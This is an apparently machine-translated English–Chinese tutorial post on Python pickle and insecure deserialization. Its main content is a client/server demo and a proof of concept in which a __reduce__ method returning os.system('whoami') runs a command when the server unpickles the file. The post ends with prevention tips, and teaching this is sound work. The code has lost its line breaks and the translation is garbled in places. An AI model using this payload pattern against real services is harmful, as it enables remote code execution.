python序列化反序列化
Before I go on rambling about what insecure deserialization is, I will explain what serialization and deserialization is.
在继续探讨什么是不安全的反序列化之前,我将解释什么是序列化和反序列化。
Serialization is the process of converting an object into a stream of bytes to store the object to memory, a database, or a file. Do not confuse object with variable. Think of it like this — variable can store only one data type at a time whereas an object can store multiple. Serialization goes by different names in different languages, it is serialization for java, pickling for python and marshalling for Perl and some other languages. Deserialization is the process of converting serialized data in bytes to readable format.
序列化是将对象转换为字节流以将对象存储到内存,数据库或文件的过程。 不要将对象与变量混淆。 可以这样想-变量一次只能存储一种数据类型,而一个对象可以存储多种数据类型。 序列化在不同的语言中使用不同的名称,它是用于Java的序列化 ,用于python的腌制以及用于Perl和其他语言的编组 。 反序列化是将字节序列化的数据转换为可读格式的过程。
Allow me to demonstrate.
请允许我示范。
We will be using a library called pickle in python. If you have a terminal up and running, type the following commands.
我们将在python中使用一个名为pickle的库。 如果您的终端已启动并正在运行,请键入以下命令。
python3
This will open a Python3 interactive session in the terminal. Now import the pickle library.
这将在终端中打开Python3交互式会话。 现在导入泡菜库。
>>>import pickle
Next, define an object.
接下来,定义一个对象。
>>>example = { "name" : "Shibin" , "position" : "sec engineer" }
Now that we have defined our object we will pickle (serialize) it. There are a lot of functions in the pickle library whose documentation can be found here. But here, we will be using only two functions from that library — dumps() and loads().
现在我们已经定义了对象,我们将其腌制(序列化)。 在pickle库中有很多函数,其文档可以在这里找到。 但是在这里,我们将仅使用该库中的两个函数-dumps()和load() 。
pickle.dumps() is used to pickle (serialize) the data and it takes a variable, function or class to be pickled as its argument.
pickle.dumps()用于对数据进行腌制(序列化),并且需要将要腌制的变量,函数或类作为其参数。
pickle.loads() is used to unpickle (deserialize) the data and takes a variable containing byte stream as a valid arguement.
pickle.loads()用于解开数据(反序列化),并使用包含字节流的变量作为有效参数。
Let’s pickle the object that we have.
让我们腌制我们拥有的对象。
>>>pickle.dumps(example)
This will pickle the data and the output will look somewhat like this:
这将使数据腌制,并且输出将如下所示:
b'\x80\x03}q\x00(X\x04\x00\x00\x00nameq\x01X\x06\x00\x00\x00Shibinq\x02X\x08\x00\x00\x00positionq\x03X\x0c\x00\x00\x00sec engineerq\x04u.'
Now to use loads(),
现在使用loads(),
>>>pickle.loads(b'\x80\x03}q\x00(X\x04\x00\x00\x00nameq\x01X\x06\x00\x00\x00Shibinq\x02X\x08\x00\x00\x00positionq\x03X\x0c\x00\x00\x00sec engineerq\x04u.')
which will give us the data back.
这将给我们返回数据。
{'name': 'Shibin', 'position': 'sec engineer'}
Now you might be wondering how this can potentially be a threat to be listed in OWASP Top 10 vulnerabilities. Insecure deserialization is when an app deserializes the data that it gets without any kind of validation, or even the authenticity of the data.
现在您可能想知道如何将其潜在地威胁到OWASP十大漏洞中 。 不安全的反序列化是指应用程序对获得的数据进行反序列化而无需任何种类的验证,甚至没有数据的真实性。
Again, allow me to demonstrate.
再次,请允许我演示。
Consider that there is a (shady) Python app which has both server side(server.py) and client side(client.py). The client will pickle some data and send it over to the server and the server will unpickle the data and display it.
考虑有一个(幕后)Python应用程序,它同时具有服务器端(server.py)和客户端(client.py)。 客户端将对某些数据进行腌制并将其发送到服务器,服务器将解开数据并将其显示。
The script for client.py is:
client.py的脚本是:
import osimport pickle
def serialize_exploit(): name = {"name":"shibin","pos":"sec Engineer"} f = open("demo.pickle","wb") safecode = pickle.dump(name,f) return safecode
if __name__ == '__main__': safecode = serialize_exploit()
(Hmm. Shady app indeed, why does it import the os library!?!?!) The script has a function serialize_exploit() which defines an object called name. Then a file called demo.pickle is opened for writing in binary format after which dump() (not dumps()) is used to pickle the object name and write into the file.
(嗯,确实是Shady应用程序,为什么它要导入os库!?!?!)。该脚本具有一个函数serialize_exploit() ,该函数定义了一个名为name的对象。 然后,打开一个名为demo.pickle的文件以二进制格式写入,然后使用dump() (而不是dumps())来腌制对象名称并写入文件。
Run the client with python3.
使用python3运行客户端。
python3 client.py
The pickled data is written into the file demo.pickle. Printing the file using cat will show:
腌制后的数据被写入文件demo.pickle。 使用cat打印文件将显示:
?}q(XnameqXshibinqXposqX sec Engineerqu.%
The script for server.py is:
server.py的脚本是:
import osimport pickle
def insecure_deserialization(): f = open("demo.pickle","rb") na = pickle.load(f) return na
if __name__ == '__main__': print(insecure_deserialization())
This script has a function called insecure_deserialization() which opens the file demo.pickle to read the data in binary format. The function load() (not loads()) will read the data and unpickle. This data is then printed.
该脚本具有一个称为insecure_deserialization()的函数,该函数打开文件demo.pickle来读取二进制格式的数据。 函数load() (不是load())将读取数据并进行修补。 然后打印该数据。
Run the server with python3.
使用python3运行服务器。
python3 server.py
I will print the data
我将打印数据
{"name":"shibin","pos":"sec Engineer"}
So in short, the client will pickle (serialise) some data and the server, without even validating the data it got, unpickles (deserializes) the data.
简而言之,客户端将对某些数据进行腌制(序列化),而服务器甚至不验证所获取的数据,就对它们进行腌制(反序列化)。
Now begins the interesting part.
现在开始有趣的部分。
Let us focus on client.py. Since there is no validation whatsoever, it will pickle any data thrown at it. So lets try to modify the script client.py as shown below
让我们专注于client.py。 由于没有任何验证,它将使所有抛出的数据腌制。 因此,让我们尝试修改脚本client.py 如下所示
import osimport pickleclass ImVulnerable(): def __reduce__(self): return(os.system,('whoami',))def serialize_exploit(): name = {"name":"shibin","pos":"sec Engineer"} f = open("demo.pickle","wb") safecode = pickle.dump(ImVulnerable(),f) return safecodeif __name__ == '__main__': safecode = serialize_exploit()
The changes are highlighted in bold. We define a class ImVulnerable() and inside it is a function which returns a linux kernel command using the os library of python. This class is then passed as an argument to dump() which then, as you are familiar by now, pickles it and writes it into the file demo.pickle. The content in the file demo.pickle is now:
更改以粗体突出显示。 我们定义了一个ImVulnerable()类,它的内部是一个使用python的os库返回linux内核命令的函数 。 然后,将该类作为参数传递给dump() ,然后,如您现在所熟悉的,将其腌制并将其写入文件demo.pickle。 文件demo.pickle中的内容现在是:
?cossystemqXwhoamiq?qRq.%
Note that we have not edited the file server.py till now. Now when I try to run the server file, it will read the demo.pickle file and then unpickles the data. This will reveal the linux kernel command instead of a text to print. The command ‘whoami’ is executed in the server script!!!!!!!
请注意,到目前为止,我们尚未编辑文件server.py。 现在,当我尝试运行服务器文件时,它将读取demo.pickle文件,然后释放数据。 这将显示linux内核命令,而不是要打印的文本。 在服务器脚本中执行命令“ whoami” !
If this was really a server and a client,
如果这确实是服务器和客户端,
就像执行远程代码执行一样!!!!!! (REMOTE CODE EXECUTION, JUST LIKE THAT!!!!!!!!!!!!)
如何防止这种情况: (How to prevent this:)
- DO NOT accept serialized data from untrusted sources. 不要接受来自不受信任来源的序列化数据。
- Run deserialization code with limited access permission. 使用有限的访问权限运行反序列化代码。
- Validate user input. Cyber Security 101 — Never trust user input! 验证用户输入。 网络安全101-永远不要相信用户输入!
Hope this article was straightforward. :)
希望本文简单明了。 :)
Reference:
参考:
python序列化反序列化